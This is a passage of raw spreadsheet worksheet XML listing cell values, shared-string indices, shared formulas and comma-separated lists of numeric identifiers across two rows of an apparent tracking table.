      <c r="CD20" s="104" t="s">
        <v>515</v>
      </c>
      <c r="CE20" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF20" s="104" t="str">
        <f t="shared" si="67"/>
        <v>2035480, 2025644</v>
      </c>
      <c r="CG20" s="104" t="s">
        <v>515</v>
      </c>
      <c r="CH20" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI20" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ20" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK20" s="104">
        <v>0.0</v>
      </c>
      <c r="CL20" s="104">
        <v>0.0</v>
      </c>
      <c r="CM20" s="105">
        <v>3.0</v>
      </c>
      <c r="CN20" s="105">
        <v>2.0</v>
      </c>
      <c r="CO20" s="105">
        <v>4.0</v>
      </c>
      <c r="CP20" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ20" s="105">
        <v>4.0</v>
      </c>
      <c r="CR20" s="105">
        <v>4.0</v>
      </c>
      <c r="CS20" s="105">
        <v>0.0</v>
      </c>
      <c r="CT20" s="105">
        <v>0.0</v>
      </c>
      <c r="CU20" s="105">
        <v>0.0</v>
      </c>
      <c r="CV20" s="105">
        <v>0.0</v>
      </c>
      <c r="CW20" s="105">
        <v>2.0</v>
      </c>
      <c r="CX20" s="105">
        <v>4.0</v>
      </c>
      <c r="CY20" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ20" s="105">
        <v>4.0</v>
      </c>
      <c r="DA20" s="105">
        <v>4.0</v>
      </c>
      <c r="DB20" s="106">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="DC20" s="106">
        <f t="shared" si="16"/>
        <v>2</v>
      </c>
      <c r="DD20" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE20" s="106">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="DF20" s="106">
        <f t="shared" si="19"/>
        <v>4</v>
      </c>
      <c r="DG20" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH20" s="106">
        <f t="shared" si="21"/>
        <v>4</v>
      </c>
      <c r="DI20" s="106">
        <f t="shared" si="22"/>
        <v>4</v>
      </c>
      <c r="DJ20" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK20" s="107">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
      <c r="DL20" s="106">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="DM20" s="108" t="s">
        <v>516</v>
      </c>
      <c r="DN20" s="108">
        <v>3.0</v>
      </c>
      <c r="DO20" s="108">
        <v>7.0</v>
      </c>
      <c r="DP20" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ20" s="108" t="s">
        <v>516</v>
      </c>
      <c r="DR20" s="108">
        <v>3.0</v>
      </c>
      <c r="DS20" s="108">
        <v>7.0</v>
      </c>
      <c r="DT20" s="108" t="s">
        <v>516</v>
      </c>
      <c r="DU20" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV20" s="108" t="str">
        <f t="shared" si="68"/>
        <v>2035480, 2025644, 44728</v>
      </c>
      <c r="DW20" s="108" t="s">
        <v>516</v>
      </c>
      <c r="DX20" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY20" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ20" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA20" s="108">
        <v>0.0</v>
      </c>
      <c r="EB20" s="108">
        <v>0.0</v>
      </c>
      <c r="EC20" s="109">
        <v>4.0</v>
      </c>
      <c r="ED20" s="109">
        <v>3.0</v>
      </c>
      <c r="EE20" s="109">
        <v>7.0</v>
      </c>
      <c r="EF20" s="109">
        <v>3.0</v>
      </c>
      <c r="EG20" s="109">
        <v>4.0</v>
      </c>
      <c r="EH20" s="109">
        <v>7.0</v>
      </c>
      <c r="EI20" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ20" s="109">
        <v>0.0</v>
      </c>
      <c r="EK20" s="109">
        <v>0.0</v>
      </c>
      <c r="EL20" s="109">
        <v>0.0</v>
      </c>
      <c r="EM20" s="109">
        <v>3.0</v>
      </c>
      <c r="EN20" s="109">
        <v>7.0</v>
      </c>
      <c r="EO20" s="109">
        <v>3.0</v>
      </c>
      <c r="EP20" s="109">
        <v>4.0</v>
      </c>
      <c r="EQ20" s="109">
        <v>7.0</v>
      </c>
      <c r="ER20" s="110">
        <f t="shared" si="27"/>
        <v>3</v>
      </c>
      <c r="ES20" s="110">
        <f t="shared" si="28"/>
        <v>3</v>
      </c>
      <c r="ET20" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU20" s="110">
        <f t="shared" si="30"/>
        <v>7</v>
      </c>
      <c r="EV20" s="110">
        <f t="shared" si="31"/>
        <v>7</v>
      </c>
      <c r="EW20" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX20" s="110">
        <f t="shared" si="33"/>
        <v>7</v>
      </c>
      <c r="EY20" s="110">
        <f t="shared" si="34"/>
        <v>7</v>
      </c>
      <c r="EZ20" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA20" s="110">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="FB20" s="110">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="FC20" s="111" t="s">
        <v>517</v>
      </c>
      <c r="FD20" s="111">
        <v>6.0</v>
      </c>
      <c r="FE20" s="111">
        <v>82.0</v>
      </c>
      <c r="FF20" s="101" t="s">
        <v>423</v>
      </c>
      <c r="FG20" s="111" t="s">
        <v>518</v>
      </c>
      <c r="FH20" s="111">
        <v>4.0</v>
      </c>
      <c r="FI20" s="111">
        <v>9.0</v>
      </c>
      <c r="FJ20" s="111" t="s">
        <v>517</v>
      </c>
      <c r="FK20" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FL20" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2002749, 2002752, 2035480, 2000419, 2025644, 44728</v>
      </c>
      <c r="FM20" s="111" t="s">
        <v>518</v>
      </c>
      <c r="FN20" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FO20" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP20" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ20" s="111">
        <v>0.0</v>
      </c>
      <c r="FR20" s="111">
        <v>0.0</v>
      </c>
      <c r="FS20" s="112">
        <v>3.0</v>
      </c>
      <c r="FT20" s="112">
        <v>3.0</v>
      </c>
      <c r="FU20" s="112">
        <v>56.0</v>
      </c>
      <c r="FV20" s="112">
        <v>3.0</v>
      </c>
      <c r="FW20" s="112">
        <v>79.0</v>
      </c>
      <c r="FX20" s="112">
        <v>82.0</v>
      </c>
      <c r="FY20" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ20" s="112">
        <v>0.0</v>
      </c>
      <c r="GA20" s="112">
        <v>0.0</v>
      </c>
      <c r="GB20" s="112">
        <v>0.0</v>
      </c>
      <c r="GC20" s="112">
        <v>3.0</v>
      </c>
      <c r="GD20" s="112">
        <v>7.0</v>
      </c>
      <c r="GE20" s="112">
        <v>3.0</v>
      </c>
      <c r="GF20" s="112">
        <v>6.0</v>
      </c>
      <c r="GG20" s="112">
        <v>9.0</v>
      </c>
      <c r="GH20" s="113">
        <f t="shared" si="39"/>
        <v>3</v>
      </c>
      <c r="GI20" s="113">
        <f t="shared" si="40"/>
        <v>3</v>
      </c>
      <c r="GJ20" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK20" s="113">
        <f t="shared" si="42"/>
        <v>56</v>
      </c>
      <c r="GL20" s="113">
        <f t="shared" si="43"/>
        <v>7</v>
      </c>
      <c r="GM20" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN20" s="113">
        <f t="shared" si="45"/>
        <v>82</v>
      </c>
      <c r="GO20" s="113">
        <f t="shared" si="46"/>
        <v>9</v>
      </c>
      <c r="GP20" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ20" s="114">
        <f t="shared" si="48"/>
        <v>0</v>
      </c>
      <c r="GR20" s="113">
        <f t="shared" si="49"/>
        <v>0</v>
      </c>
      <c r="GS20" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT20" s="94" t="s">
        <v>519</v>
      </c>
      <c r="GU20" s="130">
        <v>12449.0</v>
      </c>
      <c r="GV20" s="116">
        <v>1.0</v>
      </c>
      <c r="GW20" s="116">
        <v>9.0</v>
      </c>
      <c r="GX20" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY20" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ20" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA20" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB20" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC20" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD20" s="131">
        <v>12449.0</v>
      </c>
      <c r="HE20" s="131">
        <v>12449.0</v>
      </c>
      <c r="HF20" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG20" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH20" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI20" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ20" s="93" t="s">
        <v>520</v>
      </c>
      <c r="HK20" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL20" s="93">
        <v>1.0</v>
      </c>
      <c r="HM20" s="93">
        <f t="shared" si="52"/>
        <v>0</v>
      </c>
      <c r="HN20" s="93">
        <v>0.0</v>
      </c>
      <c r="HO20" s="93">
        <v>0.0</v>
      </c>
      <c r="HP20" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ20" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR20" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS20" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT20" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU20" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV20" s="140">
        <v>33515.0</v>
      </c>
      <c r="HW20" s="119">
        <v>1.0</v>
      </c>
      <c r="HX20" s="119">
        <v>2.0</v>
      </c>
      <c r="HY20" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ20" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA20" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB20" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC20" s="120">
        <f t="shared" si="72"/>
        <v>33515</v>
      </c>
      <c r="ID20" s="120">
        <v>33515.0</v>
      </c>
      <c r="IE20" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF20" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG20" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH20" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II20" s="99" t="s">
        <v>521</v>
      </c>
      <c r="IJ20" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK20" s="99">
        <v>1.0</v>
      </c>
      <c r="IL20" s="99">
        <v>0.0</v>
      </c>
      <c r="IM20" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN20" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO20" s="98">
        <v>2.0</v>
      </c>
      <c r="IP20" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ20" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR20" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS20" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT20" s="127"/>
      <c r="IU20" s="127"/>
      <c r="IV20" s="127"/>
      <c r="IW20" s="127"/>
      <c r="IX20" s="127"/>
      <c r="IY20" s="127"/>
      <c r="IZ20" s="127"/>
      <c r="JA20" s="127"/>
      <c r="JB20" s="127"/>
      <c r="JC20" s="127"/>
      <c r="JD20" s="127"/>
      <c r="JE20" s="127"/>
      <c r="JF20" s="127"/>
      <c r="JG20" s="127"/>
      <c r="JH20" s="127"/>
      <c r="JI20" s="127"/>
      <c r="JJ20" s="127"/>
      <c r="JK20" s="127"/>
      <c r="JL20" s="127"/>
      <c r="JM20" s="127"/>
      <c r="JN20" s="127"/>
      <c r="JO20" s="127"/>
      <c r="JP20" s="127"/>
      <c r="JQ20" s="127"/>
      <c r="JR20" s="127"/>
      <c r="JS20" s="127"/>
      <c r="JT20" s="127"/>
      <c r="JU20" s="127"/>
      <c r="JV20" s="127"/>
      <c r="JW20" s="127"/>
      <c r="JX20" s="127"/>
      <c r="JY20" s="127"/>
      <c r="JZ20" s="127"/>
      <c r="KA20" s="127"/>
      <c r="KB20" s="127"/>
      <c r="KC20" s="127"/>
      <c r="KD20" s="127"/>
      <c r="KE20" s="127"/>
      <c r="KF20" s="127"/>
      <c r="KG20" s="127"/>
      <c r="KH20" s="127"/>
      <c r="KI20" s="127"/>
      <c r="KJ20" s="127"/>
      <c r="KK20" s="127"/>
      <c r="KL20" s="127"/>
      <c r="KM20" s="127"/>
      <c r="KN20" s="127"/>
      <c r="KO20" s="127"/>
      <c r="KP20" s="127"/>
      <c r="KQ20" s="127"/>
      <c r="KR20" s="127"/>
      <c r="KS20" s="127"/>
      <c r="KT20" s="127"/>
      <c r="KU20" s="127"/>
      <c r="KV20" s="127"/>
      <c r="KW20" s="127"/>
      <c r="KX20" s="127"/>
      <c r="KY20" s="127"/>
      <c r="KZ20" s="127"/>
      <c r="LA20" s="127"/>
      <c r="LB20" s="127"/>
      <c r="LC20" s="127"/>
      <c r="LD20" s="127"/>
      <c r="LE20" s="127"/>
      <c r="LF20" s="127"/>
      <c r="LG20" s="127"/>
      <c r="LH20" s="127"/>
      <c r="LI20" s="127"/>
      <c r="LJ20" s="127"/>
      <c r="LK20" s="127"/>
      <c r="LL20" s="127"/>
      <c r="LM20" s="127"/>
      <c r="LN20" s="127"/>
      <c r="LO20" s="127"/>
      <c r="LP20" s="127"/>
      <c r="LQ20" s="127"/>
      <c r="LR20" s="127"/>
      <c r="LS20" s="127"/>
      <c r="LT20" s="127"/>
      <c r="LU20" s="127"/>
      <c r="LV20" s="127"/>
      <c r="LW20" s="127"/>
      <c r="LX20" s="127"/>
      <c r="LY20" s="127"/>
      <c r="LZ20" s="127"/>
      <c r="MA20" s="127"/>
      <c r="MB20" s="127"/>
      <c r="MC20" s="127"/>
      <c r="MD20" s="127"/>
      <c r="ME20" s="127"/>
      <c r="MF20" s="127"/>
      <c r="MG20" s="127"/>
      <c r="MH20" s="127"/>
      <c r="MI20" s="127"/>
      <c r="MJ20" s="127"/>
      <c r="MK20" s="127"/>
      <c r="ML20" s="127"/>
      <c r="MM20" s="127"/>
      <c r="MN20" s="127"/>
      <c r="MO20" s="127"/>
      <c r="MP20" s="127"/>
      <c r="MQ20" s="127"/>
      <c r="MR20" s="127"/>
      <c r="MS20" s="127"/>
      <c r="MT20" s="127"/>
      <c r="MU20" s="127"/>
      <c r="MV20" s="127"/>
      <c r="MW20" s="127"/>
      <c r="MX20" s="127"/>
      <c r="MY20" s="127"/>
      <c r="MZ20" s="127"/>
      <c r="NA20" s="127"/>
      <c r="NB20" s="127"/>
      <c r="NC20" s="127"/>
      <c r="ND20" s="127"/>
      <c r="NE20" s="127"/>
      <c r="NF20" s="127"/>
      <c r="NG20" s="127"/>
      <c r="NH20" s="127"/>
      <c r="NI20" s="127"/>
      <c r="NJ20" s="127"/>
      <c r="NK20" s="127"/>
      <c r="NL20" s="127"/>
      <c r="NM20" s="127"/>
      <c r="NN20" s="127"/>
      <c r="NO20" s="127"/>
      <c r="NP20" s="127"/>
      <c r="NQ20" s="127"/>
      <c r="NR20" s="127"/>
      <c r="NS20" s="127"/>
      <c r="NT20" s="127"/>
      <c r="NU20" s="127"/>
      <c r="NV20" s="127"/>
      <c r="NW20" s="127"/>
      <c r="NX20" s="127"/>
      <c r="NY20" s="127"/>
    </row>
    <row r="21" ht="153.75" customHeight="1">
      <c r="B21" s="89" t="s">
        <v>310</v>
      </c>
      <c r="C21" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D21" s="90" t="s">
        <v>311</v>
      </c>
      <c r="E21" s="90" t="s">
        <v>505</v>
      </c>
      <c r="F21" s="90" t="s">
        <v>506</v>
      </c>
      <c r="G21" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H21" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I21" s="92" t="s">
        <v>522</v>
      </c>
      <c r="J21" s="92" t="s">
        <v>523</v>
      </c>
      <c r="K21" s="92" t="s">
        <v>524</v>
      </c>
      <c r="L21" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M21" s="93">
        <v>160.0</v>
      </c>
      <c r="N21" s="93">
        <v>159.0</v>
      </c>
      <c r="O21" s="93">
        <v>0.0</v>
      </c>
      <c r="P21" s="93">
        <v>6293.0</v>
      </c>
      <c r="Q21" s="93">
        <f t="shared" si="70"/>
        <v>6293</v>
      </c>
      <c r="R21" s="93">
        <v>6293.0</v>
      </c>
      <c r="S21" s="93">
        <v>0.0</v>
      </c>
      <c r="T21" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U21" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V21" s="96" t="s">
        <v>525</v>
      </c>
      <c r="W21" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X21" s="97" t="s">
        <v>526</v>
      </c>
      <c r="Y21" s="96" t="s">
        <v>527</v>
      </c>
      <c r="Z21" s="96" t="s">
        <v>528</v>
      </c>
      <c r="AA21" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB21" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC21" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD21" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE21" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF21" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG21" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH21" s="99" t="s">
        <v>529</v>
      </c>
      <c r="AI21" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ21" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK21" s="100" t="s">
        <v>530</v>
      </c>
      <c r="AL21" s="100">
        <v>318.0</v>
      </c>
      <c r="AM21" s="100">
        <v>1761.0</v>
      </c>
      <c r="AN21" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO21" s="100" t="s">
        <v>530</v>
      </c>
      <c r="AP21" s="100">
        <v>318.0</v>
      </c>
      <c r="AQ21" s="100">
        <v>1761.0</v>
      </c>
      <c r="AR21" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS21" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT21" s="100" t="str">
        <f t="shared" si="71"/>
        <v>-</v>
      </c>
      <c r="AU21" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV21" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW21" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX21" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY21" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ21" s="100">
        <v>0.0</v>
      </c>
      <c r="BA21" s="102">
        <v>160.0</v>
      </c>
      <c r="BB21" s="102">
        <v>12.0</v>
      </c>
      <c r="BC21" s="102">
        <v>13.0</v>
      </c>
      <c r="BD21" s="102">
        <v>1761.0</v>
      </c>
      <c r="BE21" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BF21" s="102">
        <v>0.0</v>
      </c>
      <c r="BG21" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BH21" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BI21" s="102">
        <v>12.0</v>
      </c>
      <c r="BJ21" s="102">
        <v>13.0</v>
      </c>
      <c r="BK21" s="102">
        <v>1761.0</v>
      </c>
      <c r="BL21" s="103">
        <f t="shared" si="3"/>
        <v>0.07547169811</v>
      </c>
      <c r="BM21" s="103">
        <f t="shared" si="4"/>
        <v>0.07547169811</v>
      </c>
      <c r="BN21" s="103" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="BO21" s="103">
        <f t="shared" si="6"/>
        <v>0.002065787383</v>
      </c>
      <c r="BP21" s="103">
        <f t="shared" si="7"/>
        <v>0.002065787383</v>
      </c>
      <c r="BQ21" s="103" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="BR21" s="103">
        <f t="shared" si="9"/>
        <v>0.279834737</v>
      </c>
      <c r="BS21" s="103">
        <f t="shared" si="10"/>
        <v>0.279834737</v>
      </c>
      <c r="BT21" s="103" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
      <c r="BU21" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BV21" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BW21" s="104" t="s">
        <v>531</v>
      </c>
      <c r="BX21" s="104">
        <v>429.0</v>
      </c>
      <c r="BY21" s="104">
        <v>838.0</v>
      </c>
      <c r="BZ21" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA21" s="104" t="s">
        <v>531</v>
      </c>
      <c r="CB21" s="104">
        <v>429.0</v>
      </c>
      <c r="CC21" s="104">
        <v>838.0</v>
      </c>
      <c r="CD21" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE21" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF21" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CG21" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH21" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI21" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ21" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK21" s="104">
        <v>0.0</v>
      </c>
      <c r="CL21" s="104">
        <v>0.0</v>
      </c>
      <c r="CM21" s="105">
        <v>160.0</v>
      </c>
      <c r="CN21" s="105">
        <v>110.0</v>
      </c>
      <c r="CO21" s="105">
        <v>782.0</v>
      </c>
      <c r="CP21" s="105">
        <v>1761.0</v>
      </c>
      <c r="CQ21" s="105">
        <v>838.0</v>
      </c>
      <c r="CR21" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CS21" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CT21" s="105">
        <v>0.0</v>
      </c>
      <c r="CU21" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CV21" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CW21" s="105">
        <v>110.0</v>
      </c>
      <c r="CX21" s="105">
        <v>782.0</v>
      </c>
      <c r="CY21" s="105">
        <v>1761.0</v>
      </c>
      <c r="CZ21" s="105">
        <v>838.0</v>
      </c>
      <c r="DA21" s="105" t="s">
        <v>12</v>
      </c>
      <c r="DB21" s="106">
        <f t="shared" si="15"/>
        <v>0.6918238994</v>
      </c>
      <c r="DC21" s="106">
        <f t="shared" si="16"/>
        <v>0.6918238994</v>
      </c>
      <c r="DD21" s="106" t="str">
        <f t="shared" si="17"/>
        <v>-</v>
      </c>
      <c r="DE21" s="106">
        <f t="shared" si="18"/>
        <v>0.1242650564</v>
      </c>
      <c r="DF21" s="106">
        <f t="shared" si="19"/>
        <v>0.1242650564</v>
      </c>
      <c r="DG21" s="106" t="str">
        <f t="shared" si="20"/>
        <v>-</v>
      </c>
      <c r="DH21" s="106" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="DI21" s="106" t="str">
        <f t="shared" si="22"/>
        <v>-</v>
      </c>
      <c r="DJ21" s="106" t="str">
        <f t="shared" si="23"/>
        <v>-</v>
      </c>
      <c r="DK21" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DL21" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DM21" s="108" t="s">
        <v>532</v>
      </c>
      <c r="DN21" s="108">
        <v>508.0</v>
      </c>
      <c r="DO21" s="108">
        <v>9538.0</v>
      </c>
      <c r="DP21" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ21" s="108" t="s">
        <v>533</v>
      </c>
      <c r="DR21" s="108">
        <v>508.0</v>
      </c>
      <c r="DS21" s="108">
        <v>9538.0</v>
      </c>
      <c r="DT21" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU21" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV21" s="108" t="str">
        <f t="shared" si="68"/>
        <v>-</v>
      </c>
      <c r="DW21" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX21" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY21" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ21" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA21" s="108">
        <v>0.0</v>
      </c>
      <c r="EB21" s="108">
        <v>0.0</v>
      </c>
      <c r="EC21" s="109">
        <v>160.0</v>
      </c>
      <c r="ED21" s="109">
        <v>110.0</v>
      </c>
      <c r="EE21" s="109">
        <v>782.0</v>
      </c>
      <c r="EF21" s="109">
        <v>9538.0</v>
      </c>
      <c r="EG21" s="109">
        <v>838.0</v>
      </c>
      <c r="EH21" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EI21" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EJ21" s="109">
        <v>0.0</v>
      </c>
      <c r="EK21" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EL21" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EM21" s="109">
        <v>110.0</v>
      </c>
      <c r="EN21" s="109">
        <v>782.0</v>
      </c>
      <c r="EO21" s="109">
        <v>9538.0</v>
      </c>
      <c r="EP21" s="109">
        <v>838.0</v>
      </c>
      <c r="EQ21" s="109" t="s">
        <v>12</v>
      </c>
      <c r="ER21" s="110">
        <f t="shared" si="27"/>
        <v>0.6918238994</v>
      </c>
      <c r="ES21" s="110">
        <f t="shared" si="28"/>
        <v>0.6918238994</v>
      </c>
      <c r="ET21" s="110" t="str">
        <f t="shared" si="29"/>
        <v>-</v>
      </c>
      <c r="EU21" s="110">
        <f t="shared" si="30"/>
        <v>0.1242650564</v>
      </c>
      <c r="EV21" s="110">
        <f t="shared" si="31"/>
        <v>0.1242650564</v>
      </c>
      <c r="EW21" s="110" t="str">
        <f t="shared" si="32"/>
        <v>-</v>
      </c>
      <c r="EX21" s="110" t="str">
        <f t="shared" si="33"/>
        <v>-</v>
      </c>
      <c r="EY21" s="110" t="str">
        <f t="shared" si="34"/>
        <v>-</v>
      </c>
      <c r="EZ21" s="110" t="str">
        <f t="shared" si="35"/>
        <v>-</v>
      </c>
      <c r="FA21" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FB21" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FC21" s="111" t="s">
        <v>534</v>
      </c>
      <c r="FD21" s="111">
        <v>729.0</v>
      </c>
      <c r="FE21" s="111">
        <v>13683.0</v>
      </c>
      <c r="FF21" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG21" s="111" t="s">
        <v>535</v>
      </c>
      <c r="FH21" s="111">
        <v>727.0</v>
      </c>
      <c r="FI21" s="111">
        <v>13679.0</v>
      </c>
      <c r="FJ21" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FK21" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL21" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM21" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN21" s="111" t="str">
        <f>IF(FL21="-",FM21,FL21)</f>
        <v>2002752, 2002749</v>
      </c>
      <c r="FO21" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP21" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ21" s="111">
        <v>0.0</v>
      </c>
      <c r="FR21" s="111">
        <v>0.0</v>
      </c>
      <c r="FS21" s="112">
        <v>160.0</v>
      </c>
      <c r="FT21" s="112">
        <v>130.0</v>
      </c>
      <c r="FU21" s="112">
        <v>3363.0</v>
      </c>
      <c r="FV21" s="112">
        <v>9538.0</v>
      </c>
      <c r="FW21" s="112">
        <v>4145.0</v>
      </c>
      <c r="FX21" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FY21" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FZ21" s="112">
        <v>0.0</v>
      </c>
      <c r="GA21" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GB21" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GC21" s="112">
        <v>130.0</v>
      </c>
      <c r="GD21" s="112">
        <v>3361.0</v>
      </c>
      <c r="GE21" s="112">
        <v>9538.0</v>
      </c>
      <c r="GF21" s="112">
        <v>4141.0</v>
      </c>
      <c r="GG21" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GH21" s="113">
        <f t="shared" si="39"/>
        <v>0.8176100629</v>
      </c>
      <c r="GI21" s="113">
        <f t="shared" si="40"/>
        <v>0.8176100629</v>
      </c>
      <c r="GJ21" s="113" t="str">
        <f t="shared" si="41"/>
        <v>-</v>
      </c>
      <c r="GK21" s="113">
        <f t="shared" si="42"/>
        <v>0.5344033053</v>
      </c>
      <c r="GL21" s="113">
        <f t="shared" si="43"/>
        <v>0.5340854918</v>
      </c>
      <c r="GM21" s="113" t="str">
        <f t="shared" si="44"/>
        <v>-</v>
      </c>
      <c r="GN21" s="113" t="str">
        <f t="shared" si="45"/>
        <v>-</v>
      </c>
      <c r="GO21" s="113" t="str">
        <f t="shared" si="46"/>
        <v>-</v>
      </c>
